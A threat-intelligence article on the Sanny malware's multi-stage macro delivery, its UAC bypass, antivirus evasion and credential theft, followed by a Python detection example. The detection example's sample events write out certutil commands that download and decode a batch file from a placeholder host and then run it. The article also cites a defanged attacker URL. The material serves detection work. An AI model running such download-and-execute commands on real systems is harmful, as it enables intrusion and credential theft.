Sanny malware adapts and reemerges
Hackers behind the Sanny malware have changed the way it delivers its payload. The attackers have upgraded their delivery methods for planting malware on systems via document attachments sent as part of spam and phishing campaigns. Sanny is now delivered in multiple stages, with each stage being downloaded from the attacker's server. Command-line commands, the ability to infect systems running Windows 10, and the use of recent User Account Control bypass techniques have also been added. The previous method used to spread Sanny malware was not multi-stage: in the previous variants, all the components were dropped directly on the disk and executed by the macro-based document.
The attackers have targeted English and Russian-language diplomatic computers around the world since 2012. The attacks use both rigged Cyrillic and English-language Word files. The malicious file contains an embedded macro that, when enabled, triggers an infection chain that delivers the Sanny malware payload.
When victims enable the macro while opening a Word attachment, it triggers the first stage of the delivery method. An analysis of the macro revealed that a Text Box found in the Word document holds a hidden malicious command. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line. Next, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch file from the following URL: http://more.1apps(.)com/1.txt. The macro then decodes the encoded file and drops it in the temp directory with the name 1.bat. The bat file downloads a CAB file matching the architecture of the operating system. The rest of the malicious activities are performed by the downloaded CAB file. Normally, CAB files store data related to various Windows installations, including device drivers or system files. In the case of Sanny, the CAB file contains several malicious components, including ipnet.dll (the Sanny malware itself) and ipnet.ini, a configuration file used by Sanny. The malicious CAB also includes update.dll, which is used to execute a Windows 10 User Account Control bypass. The bat file also checks whether specific antivirus software is installed on the victim's system. If found, the CAB installation is changed accordingly in an attempt to bypass detection. Once finally in, the malware gathers everything from Microsoft Outlook accounts and browser data that stores usernames and passwords. Sanny then sends the data to the attacker's command and control server via FTP.
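As an added example (not from the original article and not the attackers' code), the detection logic below flags the delivery chain described above when run over constructed process-creation events shaped like Sysmon Event ID 1 records: certutil.exe fetching or decoding a file, a batch file launched from the Temp directory, and an Office application as the parent process. The paths, user name and URL in the sample events are placeholders, not indicators from the article.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample events (Sysmon Event ID 1 field names); all values are
# placeholders chosen for the example, not indicators from the article.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
CMD = r"C:\Windows\System32\cmd.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": WINWORD, "Image": CERTUTIL,  # stage 1: fetch encoded file
     "CommandLine": f"certutil -urlcache -split -f http://example.invalid/1.txt {TEMP}\\1.txt"},
    {"ParentImage": WINWORD, "Image": CERTUTIL,  # stage 1: decode it to 1.bat
     "CommandLine": f"certutil -decode {TEMP}\\1.txt {TEMP}\\1.bat"},
    {"ParentImage": WINWORD, "Image": CMD,       # stage 2: run the batch file
     "CommandLine": f"cmd /c {TEMP}\\1.bat"},
    {"ParentImage": CMD, "Image": CERTUTIL,      # benign: admin verifying a cert
     "CommandLine": "certutil -verify C:\\certs\\server.cer"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.I)
CERTUTIL_DECODE = re.compile(r"-decode\b", re.I)
BATCH_IN_TEMP = re.compile(r"\\temp\\[^\s\"]+\.bat\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Event) -> List[str]:
    """Return the reasons an event matches the delivery pattern (empty if none)."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    reasons: List[str] = []
    if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        reasons.append("certutil fetching a remote file")
    if image == "certutil.exe" and CERTUTIL_DECODE.search(cmd):
        reasons.append("certutil decoding a dropped file")
    if image == "cmd.exe" and BATCH_IN_TEMP.search(cmd):
        reasons.append("batch file run from the Temp directory")
    # Suspicious tool use alone is worth a look; an Office parent raises confidence.
    if reasons and parent in OFFICE_APPS:
        reasons.append(f"parent is Office process {parent}")
    return reasons


def scan(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """Indices and reasons of all matching events, in order."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]
```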
To compress the collected data, Sanny doesn't use an archiving utility; instead, the malware uses the Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform the compression. This shows that the hackers behind Sanny are evolving their malware delivery methods by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware creators increase the difficulty of reverse engineering and potentially evade security solutions.